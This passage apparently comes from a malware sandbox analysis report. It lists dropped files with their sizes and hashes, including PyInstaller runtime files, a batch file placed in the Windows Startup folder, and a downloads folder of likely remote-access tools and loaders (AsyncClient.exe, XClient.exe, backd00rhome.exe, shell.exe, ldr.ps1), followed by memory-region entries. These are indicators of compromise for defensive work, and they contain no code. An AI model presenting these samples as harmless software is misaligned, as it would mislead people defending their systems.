        aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9

        SHA512

        790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_brotli.cp311-win_amd64.pyd

        Filesize

        801KB

        MD5

        d9fc15caf72e5d7f9a09b675e309f71d

        SHA1

        cd2b2465c04c713bc58d1c5de5f8a2e13f900234

        SHA256

        1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf

        SHA512

        84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_bz2.pyd

        Filesize

        81KB

        MD5

        4101128e19134a4733028cfaafc2f3bb

        SHA1

        66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

        SHA256

        5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

        SHA512

        4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_cffi_backend.cp311-win_amd64.pyd

        Filesize

        174KB

        MD5

        739d352bd982ed3957d376a9237c9248

        SHA1

        961cf42f0c1bb9d29d2f1985f68250de9d83894d

        SHA256

        9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980

        SHA512

        585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_ctypes.pyd

        Filesize

        120KB

        MD5

        6a9ca97c039d9bbb7abf40b53c851198

        SHA1

        01bcbd134a76ccd4f3badb5f4056abedcff60734

        SHA256

        e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535

        SHA512

        dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_decimal.pyd

        Filesize

        245KB

        MD5

        d47e6acf09ead5774d5b471ab3ab96ff

        SHA1

        64ce9b5d5f07395935df95d4a0f06760319224a2

        SHA256

        d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e

        SHA512

        52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_hashlib.pyd

        Filesize

        62KB

        MD5

        de4d104ea13b70c093b07219d2eff6cb

        SHA1

        83daf591c049f977879e5114c5fea9bbbfa0ad7b

        SHA256

        39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e

        SHA512

        567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_lzma.pyd

        Filesize

        154KB

        MD5

        337b0e65a856568778e25660f77bc80a

        SHA1

        4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

        SHA256

        613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

        SHA512

        19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_multiprocessing.pyd

        Filesize

        32KB

        MD5

        1386dbc6dcc5e0be6fef05722ae572ec

        SHA1

        470f2715fafd5cafa79e8f3b0a5434a6da78a1ba

        SHA256

        0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007

        SHA512

        ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_overlapped.pyd

        Filesize

        48KB

        MD5

        01ad7ca8bc27f92355fd2895fc474157

        SHA1

        15948cd5a601907ff773d0b48e493adf0d38a1a6

        SHA256

        a083e83f609ed7a2fc18a95d44d8f91c9dc74842f33e19e91988e84db94c3b5b

        SHA512

        8fe6ac8430f8dde45c74f45575365753042642dc9fa9defbcf25ae1832baf6abb1ea1ad6d087e4ece5d0590e36cee1beea99845aef6182c1eec4bafdf9557604

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_queue.pyd

        Filesize

        30KB

        MD5

        ff8300999335c939fcce94f2e7f039c0

        SHA1

        4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a

        SHA256

        2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78

        SHA512

        f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_socket.pyd

        Filesize

        76KB

        MD5

        8140bdc5803a4893509f0e39b67158ce

        SHA1

        653cc1c82ba6240b0186623724aec3287e9bc232

        SHA256

        39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769

        SHA512

        d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_ssl.pyd

        Filesize

        155KB

        MD5

        069bccc9f31f57616e88c92650589bdd

        SHA1

        050fc5ccd92af4fbb3047be40202d062f9958e57

        SHA256

        cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32

        SHA512

        0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\_uuid.pyd

        Filesize

        23KB

        MD5

        9a4957bdc2a783ed4ba681cba2c99c5c

        SHA1

        f73d33677f5c61deb8a736e8dde14e1924e0b0dc

        SHA256

        f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44

        SHA512

        027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\base_library.zip

        Filesize

        1.4MB

        MD5

        9836732a064983e8215e2e26e5b66974

        SHA1

        02e9a46f5a82fa5de6663299512ca7cd03777d65

        SHA256

        3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f

        SHA512

        1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\certifi\cacert.pem

        Filesize

        292KB

        MD5

        50ea156b773e8803f6c1fe712f746cba

        SHA1

        2c68212e96605210eddf740291862bdf59398aef

        SHA256

        94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47

        SHA512

        01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\charset_normalizer\md.cp311-win_amd64.pyd

        Filesize

        10KB

        MD5

        cbf62e25e6e036d3ab1946dbaff114c1

        SHA1

        b35f91eaf4627311b56707ef12e05d6d435a4248

        SHA256

        06032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37

        SHA512

        04b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

        Filesize

        118KB

        MD5

        bac273806f46cffb94a84d7b4ced6027

        SHA1

        773fbc0435196c8123ee89b0a2fc4d44241ff063

        SHA256

        1d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b

        SHA512

        eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\libcrypto-1_1.dll

        Filesize

        3.3MB

        MD5

        6f4b8eb45a965372156086201207c81f

        SHA1

        8278f9539463f0a45009287f0516098cb7a15406

        SHA256

        976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

        SHA512

        2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\libffi-8.dll

        Filesize

        34KB

        MD5

        32d36d2b0719db2b739af803c5e1c2f5

        SHA1

        023c4f1159a2a05420f68daf939b9ac2b04ab082

        SHA256

        128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c

        SHA512

        a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\libssl-1_1.dll

        Filesize

        686KB

        MD5

        8769adafca3a6fc6ef26f01fd31afa84

        SHA1

        38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

        SHA256

        2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

        SHA512

        fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\multidict\_multidict.cp311-win_amd64.pyd

        Filesize

        46KB

        MD5

        ecc0b2fcda0485900f4b72b378fe4303

        SHA1

        40d9571b8927c44af39f9d2af8821f073520e65a

        SHA256

        bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1

        SHA512

        24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\propcache\_helpers_c.cp311-win_amd64.pyd

        Filesize

        73KB

        MD5

        04444380b89fb22b57e6a72b3ae42048

        SHA1

        cfe9c662cb5ca1704e3f0763d02e0d59c5817d77

        SHA256

        d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4

        SHA512

        9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\pyexpat.pyd

        Filesize

        193KB

        MD5

        1c0a578249b658f5dcd4b539eea9a329

        SHA1

        efe6fa11a09dedac8964735f87877ba477bec341

        SHA256

        d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509

        SHA512

        7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\python3.dll

        Filesize

        64KB

        MD5

        34e49bb1dfddf6037f0001d9aefe7d61

        SHA1

        a25a39dca11cdc195c9ecd49e95657a3e4fe3215

        SHA256

        4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281

        SHA512

        edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\python311.dll

        Filesize

        5.5MB

        MD5

        9a24c8c35e4ac4b1597124c1dcbebe0f

        SHA1

        f59782a4923a30118b97e01a7f8db69b92d8382a

        SHA256

        a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

        SHA512

        9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\select.pyd

        Filesize

        28KB

        MD5

        97ee623f1217a7b4b7de5769b7b665d6

        SHA1

        95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0

        SHA256

        0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790

        SHA512

        20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

        Filesize

        1KB

        MD5

        4ce7501f6608f6ce4011d627979e1ae4

        SHA1

        78363672264d9cd3f72d5c1d3665e1657b1a5071

        SHA256

        37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b

        SHA512

        a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\unicodedata.pyd

        Filesize

        1.1MB

        MD5

        bc58eb17a9c2e48e97a12174818d969d

        SHA1

        11949ebc05d24ab39d86193b6b6fcff3e4733cfd

        SHA256

        ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa

        SHA512

        4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\wheel-0.45.0.dist-info\INSTALLER

        Filesize

        4B

        MD5

        365c9bfeb7d89244f2ce01c1de44cb85

        SHA1

        d7a03141d5d6b1e88b6b59ef08b6681df212c599

        SHA256

        ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

        SHA512

        d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

      • C:\Users\Admin\AppData\Local\Temp\_MEI5562\yarl\_quoting_c.cp311-win_amd64.pyd

        Filesize

        95KB

        MD5

        1c6c610e5e2547981a2f14f240accf20

        SHA1

        4a2438293d2f86761ef84cfdf99a6ca86604d0b8

        SHA256

        4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804

        SHA512

        f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n4zygzwc.hsz.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Filesize

        315B

        MD5

        b8c9a64544bf22a65f83b894c6ba6363

        SHA1

        e93689a9524557d212312b77b21f6247908b6a23

        SHA256

        601769d041dbb9df8531997687f8c556e9176c92958718cc184f94d8eb77f1ba

        SHA512

        a37f8f35b2fbce71661084dfd82a1ba2f35a79ba08beaf18c2d22af5c4e690d907108249f9a8bbe6f5809e5c0b95f1d549b0f50ee0d20fd0623f2370f11264d1

      • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

        Filesize

        16B

        MD5

        d29962abc88624befc0135579ae485ec

        SHA1

        e40a6458296ec6a2427bcb280572d023a9862b31

        SHA256

        a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

        SHA512

        4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

        Filesize

        687B

        MD5

        2b1b215c22418f9f99e54594172847a3

        SHA1

        538f84b9c38d17c591de14eaa62bba0369dc6b3e

        SHA256

        1fd635cc5c86e7a55459aa5a07ec330ebe85b94700bd5c799fb40a1822b75840

        SHA512

        d1f4866851d792e50c4379119a398dade723fc062bf6651dfd88e9a226cda0e93512e6fa4155e4eb3347a1027c1c98d4fbdc235f0466a4294a597d8176345b19

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

        Filesize

        1KB

        MD5

        0600919c5fcf4f14ce429dc3942b640b

        SHA1

        581e0191ea06471a367c96007528df73783b98a8

        SHA256

        7cbb4452a1338e21aaa0deada0f61e24fdb215fbd881861b9847939e6852ee6b

        SHA512

        3ceb7c753c74ec8bfd9fae828a1aea61d3fb5fe4787b4e2183e14ac321fcdac7595bdb77bf3f0a19081e1c03aed4035f575b09718902bd73867a41b81fa0da06

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DC2111BAT.bat

        Filesize

        14KB

        MD5

        b4ca7ff5efd0278fef09daf595489560

        SHA1

        112847b2bf3d344b10aae9d6bb375de51b0d3b7b

        SHA256

        5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c

        SHA512

        5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2

      • C:\Users\Admin\Downloads\haus\AsyncClient.exe

        Filesize

        45KB

        MD5

        9ae47a32295e25abad934f880b2246d2

        SHA1

        c7b027f6946e2343712d5b4e5a0e707a853bf0b1

        SHA256

        3c924a149b80a5bf5862c2e3029dd0717a84b5e640332da71e0fa70eb04ec096

        SHA512

        3563a201544254367f5e2605aedcb0b0ab3e4eb9c2e80e26dd7219c4edd2c47e52880b11712f2903e9d00bed2aaea31fad7bc7633c27c6a9ca739cb8cc6165ff

      • C:\Users\Admin\Downloads\haus\OLDxTEAM.exe

        Filesize

        290KB

        MD5

        51edcaec1968b2115cd3360f1536c3de

        SHA1

        2858bed0a5dafd25c97608b5d415c4cb94dc41c9

        SHA256

        2be4cdb599fbe73e1d3177599cded9c343fbd32653d0862ca52d09a416fa971d

        SHA512

        f5246ec7ddf5ede76bcdc1cf6ac3c5c77e04e04d97d821b115ca48a4098906f135bd8c42d3d537585a4825a323b342ed067f8ea0b1d87ac6dbfb9931e22b7fa6

      • C:\Users\Admin\Downloads\haus\Solara_Protect.exe

        Filesize

        63KB

        MD5

        9eb074e0713a33f7a6e499b0fbf2484c

        SHA1

        132ca59a5fb654c3d0794f92f05eaf43e3a7af94

        SHA256

        519f3ceedba4471f3d5178451c1007911145fb6eaf4e259a2c29b8e3483dabb1

        SHA512

        367fbbf6f058ef21367e329c8b0373d482c9c97dfbb42a67b17c9b1dc1d0139ae879c8ddb87b0960c5545746610d2c5690343abb458818c2dea9dbca66f39794

      • C:\Users\Admin\Downloads\haus\TCP.exe

        Filesize

        45KB

        MD5

        f127aef5829703426ff8399a76c1852c

        SHA1

        17e72d081ceb20119abe7bef8c640d5db48276f6

        SHA256

        6907ab3a0f4e69bf6dcb8c03a18bd8402afa701ade8863a0e15808614ffb1b17

        SHA512

        c3125920567b59119b86e284ed96c3860b1998f9d6b6078b5c2a18aa6b4c56274124fd2f77710bbbf972a6387ef20cb4a5d19c96be2131fb02f6d5692c2384c0

      • C:\Users\Admin\Downloads\haus\XClient.exe

        Filesize

        80KB

        MD5

        1fdbde7773dca61675f332594d8f7e99

        SHA1

        b993f62c871c311fe9a398ad2424389b1072906e

        SHA256

        439f9b3edd8b69f54c8a03c34f56660b95f345688edfad7911780a41f9839d65

        SHA512

        51a74a252c827f9fd3cbcd39cd6b95d721b97fd25fb8f78574700ccbf60e85d072ffa5b893887d67a2c5f69478df3ce687c6d11632312117bed928800b3e63b6

      • C:\Users\Admin\Downloads\haus\anne.exe

        Filesize

        45KB

        MD5

        1afe69dfd0013bf97a1ab941b6c5d984

        SHA1

        8dba7082cdcf8e0524a4300ca9ef437e281618ed

        SHA256

        33410cc8e262e90101e87a94f5cbc44c85adbe3a395fc683f99fd2ceb323cd2e

        SHA512

        e5629ba2be6567acfea94bcd10bdef48412074f4b8164436a4a4c28925b1d96e03f5f3640b56b2223a7ff686dde45fd5f446ef28278f3890102535340f41bb97

      • C:\Users\Admin\Downloads\haus\backd00rhome.exe

        Filesize

        72KB

        MD5

        ef397426691bc35566bc401598e10d60

        SHA1

        40ac43354d2ea80706dae6a60ce5cb668ba35514

        SHA256

        ec34977344bded135083b97756df058d33565bb80a1ab48cccb82999a6b340cf

        SHA512

        023009d6a0b923d582a84a6db93b4b4a5c8017ef2217937490e83df801c56b12a962ba88ec4f28bb1fc2aee7ad393d8c93bd097e27b969f061876ac85339e746

      • C:\Users\Admin\Downloads\haus\com%20surrogate.exe

        Filesize

        59KB

        MD5

        8843d79e5ece984ef952051cb5b4f601

        SHA1

        72bb266a7aae0320f05276a0ed42753c2dc07f2b

        SHA256

        80d44bb082a49dd49bf5926ea31ca0c225725daa4ba0614ae3ef1e121fdef89c

        SHA512

        e19cb6c484f0415cd3cab9e716a07cd5ae3662ee22b690310081c68ab73617df8fa8236a98d72fbf5ae3b88efefe88e3c845eb42f0bf9b93963c628573c87ba1

      • C:\Users\Admin\Downloads\haus\evetbeta.exe

        Filesize

        92KB

        MD5

        6f6137e6f85dc8dac7ff87ca4c86af4c

        SHA1

        fc047ad39f8f2f57fa6049e1883ccab24bea8f82

        SHA256

        a370eacabf4af9caa5502c39b40c95eda6be23666231e24da1b56277a222f3e9

        SHA512

        2a3d60bac0a40730b49d361d13000115539c448ef1ecbbffafa22ebe78fc9009db0846e84e7f3c3526d22d5531cedddae8fae7678f453e48876581824cd9dea4

      • C:\Users\Admin\Downloads\haus\kali_tools.exe

        Filesize

        72KB

        MD5

        0cf225d4e9a1a440b7f9194d56533598

        SHA1

        fb7446f256e389fe8f957ccb34422870b52fb233

        SHA256

        2c042ffcb4b89bf6a65195ca81430a0497a827c125b24aea15822302d4d76a59

        SHA512

        7e8efd8a96545b54762ad2d4998e55332f1162d007ce544b5d6aeb4112f1674924319b9a2369cbb90c08fddfe0549242bf9ac563e54c9ed11d0f633ae7a10853

      • C:\Users\Admin\Downloads\haus\ldr.ps1

        Filesize

        881B

        MD5

        08a5af8712cc8e8739f368de6a0b0bb1

        SHA1

        fc53d0660f16058f69938aad64363d886c64604e

        SHA256

        1b62f76fe4b8c714af2ae108c56acc447a0507ba58f9b3e645a495b4945a41e2

        SHA512

        5d78167de34a83c89d2ff1a2d59f737d27188a41f0dfa39d292d4aa28c1a25b58cbf64743c837495f191025f8999ff20c8a5313ca50f529f741c74d2cb8186d1

      • C:\Users\Admin\Downloads\haus\shell.exe

        Filesize

        72KB

        MD5

        b46f3e8790d907a8f6e216b006eb1c95

        SHA1

        a16301af03d94abe661cc11b5ca3da7fc1e6a7bb

        SHA256

        f400dfc798338bf8c960fe04bafe60a3f95d4facd182ab08448b4918efe35262

        SHA512

        16345afb33b8626893da0700b9ac7580cdea3b3d42ace6d137abb9f6e99a0e446d9af2fbb98979b7ea815cab07fb6eb368a590166bdf048deacd7fd63c429de9

      • memory/1344-244-0x0000000000620000-0x0000000000632000-memory.dmp

        Filesize

        72KB

      • memory/1608-208-0x0000000000C30000-0x0000000000C42000-memory.dmp

        Filesize

        72KB

      • memory/2028-224-0x00000000006D0000-0x000000000071E000-memory.dmp

        Filesize

        312KB

      • memory/2464-301-0x0000021AF2220000-0x0000021AF2230000-memory.dmp

        Filesize

        64KB

      • memory/2672-308-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

      • memory/2672-440-0x0000000005E50000-0x0000000005EB6000-memory.dmp

        Filesize

        408KB

      • memory/2672-439-0x0000000006390000-0x0000000006934000-memory.dmp

        Filesize

        5.6MB

      • memory/3440-192-0x0000000000E60000-0x0000000000E76000-memory.dmp

        Filesize

        88KB

      • memory/3460-253-0x000002AFFFF20000-0x000002AFFFF42000-memory.dmp

        Filesize

        136KB

      • memory/3928-302-0x0000000005870000-0x000000000590C000-memory.dmp

        Filesize

        624KB

      • memory/3928-206-0x0000000000FF0000-0x0000000001006000-memory.dmp

        Filesize

        88KB

      • memory/4268-205-0x0000000000460000-0x0000000000472000-memory.dmp

        Filesize

        72KB

      • memory/4276-232-0x0000000000310000-0x000000000032A000-memory.dmp

        Filesize

        104KB

      • memory/4660-389-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

      • memory/4660-392-0x00007FFB04E40000-0x00007FFB04E50000-memory.dmp

        Filesize

        64KB

      • memory/4660-391-0x00007FFB04E40000-0x00007FFB04E50000-memory.dmp

        Filesize

        64KB

      • memory/4660-386-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

      • memory/4660-387-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

      • memory/4660-388-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB

      • memory/4660-390-0x00007FFB074D0000-0x00007FFB074E0000-memory.dmp

        Filesize

        64KB